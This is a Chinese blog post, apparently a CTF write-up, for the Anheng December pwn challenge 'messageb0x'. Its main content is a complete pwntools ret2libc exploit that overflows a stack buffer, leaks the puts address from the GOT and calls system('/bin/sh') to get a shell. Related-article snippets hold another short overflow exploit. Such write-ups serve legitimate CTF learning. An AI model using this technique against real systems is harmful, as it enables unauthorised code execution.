安恒 12月 pwn ----messageb0x

最新推荐文章于 2020-08-27 10:00:10 发布
最新推荐文章于 2020-08-27 10:00:10 发布
阅读量723 收藏
点赞数
分类专栏: PWN_WP 文章标签: 安恒 12月 pwn ----messageb0x
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42192672/article/details/85240692
版权

这次安恒就看了pwn题,第二个是orange,还不会,就做了下第一个

总体就是个简单的rop,但是有个坑就是题目让我们猜libc的版本到底是啥

然后我在IDA里看到了一个字符串

被坑惨了,在2.27调试了半天后来发现是2.23的,哭了

#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']

cn = process('./messageb0x')
bin = ELF('./messageb0x')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
     
def z(a=''):
    gdb.attach(cn,a)
    if a == '':
        raw_input()

retn_addr=0x080490c0
cn.recvuntil('are:')
cn.sendline('')
#z('b *0x08049303')
#z('b *0x080492E2\n'+'b *0x08049315')
cn.recvuntil('address:')
cn.sendline('')
cn.recvuntil('to say:')
payload=(0x58+0x04)*'a'
payload+=p32(bin.plt['puts'])+p32(retn_addr)+p32(bin.got['puts'])
cn.sendline(payload)
#print(hex(puts_plt))
cn.recvuntil('--> Thank you !\n')
puts_addr=u32(cn.recv(4))
#puts_addr=u32(cn.recvuntil('\xf7')[-8:])
print(hex(puts_addr))
offset=libc.symbols['puts']-puts_addr
system_addr=libc.symbols['system']-offset
bin_addr=libc.search('/bin/sh').next()-offset
print(hex(system_addr))
print(hex(bin_addr))
cn.recvuntil('are:')
cn.sendline('')
cn.recvuntil('address:')
cn.sendline('')
cn.recvuntil('say:')
payload=(0x58+0x04)*'a'
payload+=p32(system_addr)+'aaaa'+p32(bin_addr)
cn.sendline(payload)
cn.interactive()
xiaoyuyulala
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安恒杯-misc-附件资源
03-05
安恒杯-misc-附件资源
安恒赛WriteUp-2018.12
BlusKing
12-22 2889
安恒赛WriteUp2018-12   WEB1-easy: web1反序列化   一打开就显示了源代码:  <?php   @error_reporting(1); include 'flag.php'; class baby {        public $file;     function __toString()           {      ...
2018东南大学 SUS 十一欢乐赛 pwn解题记录
weixin_44113469的博客
03-21 297
pwn2plus 直接栈溢出覆盖调用callsystem函数。 exp from pwn import * #p = remote("47.100.40.190" , 10007) p=process("./pwn2") elf = ELF("./pwn2") callsystem=0x400596 pay = "a"*0x80+"a"*8 pay +=p64(callsystem)+p64(0...
安恒pwn魔法
weixin_30737433的博客
08-13 329
魔法这是比较基础的一道栈溢出;首先看下开启的防护机制Checksec magicc发现只有nx防护我们载入ida发现溢出点Buf实际溢出空间为0x16,构造expimport timefrom pwn import *p=process('./magicc')p.recvuntil('Choose!')p.sendline('4')p.recvuntil('success')payloa...
2018 -12安恒pwn
Maxmalloc的博客
12-23 1455
Messageb0x $ file messageb0x messageb0x: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d932d2afbca74...
pwn-messageb0x-学习笔记
小龙在线
08-27 474
messageb0x是一个32位的ELF文件,用IDA打开: F5反编译: 关键在于process_info这个函数: v1的输入字符200(0xC8)限制明显大于栈的ebp的58h,所以存在溢出漏洞。 然后Shift+F12查看字符串,看有没有特殊字符串(system),没有: 可以利用 查找libc版本和system的偏移: 攻击脚本: from pwn import * elf = ELF('./messageb0x') sh = process('./messageb0x') puts
CTF安恒周周练1-9题+解析.zip
10-10
CTF安恒周周练1-9题+解析.zip
安恒玄武盾技术白皮书-网络行为审计.docx
01-16
安恒玄武盾技术白皮书-网络行为审计.docx
20210413-东北证券-安恒信息-688023-云安全龙头厂商,充分受益行业高景气.pdf
04-14
20210413-东北证券-安恒信息-688023-云安全龙头厂商,充分受益行业高景气.pdf
专题资料(2021-2022年)安恒信息明御WEB应用防火墙产品白皮书.doc
11-29
专题资料(2021-2022年)安恒信息明御WEB应用防火墙产品白皮书.doc
20200310-天风证券-安恒信息-688023-新安全领军企业,收入有望持续高增长.pdf
06-19
20200310-天风证券-安恒信息-688023-新安全领军企业,收入有望持续高增长.pdf
安恒信息2010-2011-WEB-零日漏洞安全报告
10-23
安恒信息2010-2011-WEB-零日漏洞安全报告 安恒信息2010-2011-WEB-零日漏洞安全报告
安恒pwn1
04-25
在这里,我们可以看到ebp-0x88,算一下,ebp-0x88实际上是0xffffd520。 为了覆盖返回地址,我们需要把ebp也覆盖掉,因此需要140字节+system的地址。然而,system函数的参数怎么获取呢?我们可以使用记事本打开程序...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
计算机行业:科创板询价报告之安恒信息-1017-华鑫证券-18页.pdf
最新发布
07-23
计算机行业:科创板询价报告之安恒信息-1017-华鑫证券-18页.pdf
2019安恒PWN题目题目
weixin_41293827的博客
02-26 969
链接:https://pan.baidu.com/s/1bQtCIPGeLvLSgmtJfBTKIg 提取码:30be
pwnable.tw 9 seethefile [250 pts]
qq_42192672的博客
12-04 770
之前做了五道题直接做自闭了,各种手写shellcode,学到了很多姿势,这是一道文件题,没接触过,来挑战一下…… no canary found!!!!!! 拖进IDA分析 一共有五个功能 有一个明显的栈溢出 我们可以通过溢出name来覆盖fp 1)openfile:打开文件,文件指针就是fp,不能打开文件名为flag的文件 2)readfile:从fp读取0x18F个字节...
安恒杯-元数据存储
weixin_30911809的博客
12-27 107
扫描到.DS_Store 文件 Mac每个目录都会有个文件叫.DS_Store,它是用于存储当前文件夹的一些Meta信息。 下载.DS_Store 文件,会发现存在showmeflag.php 直接访问showmeflag.php得到flag 转载于:https://www.cnblogs.com/hell0w/p/8125827.html...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值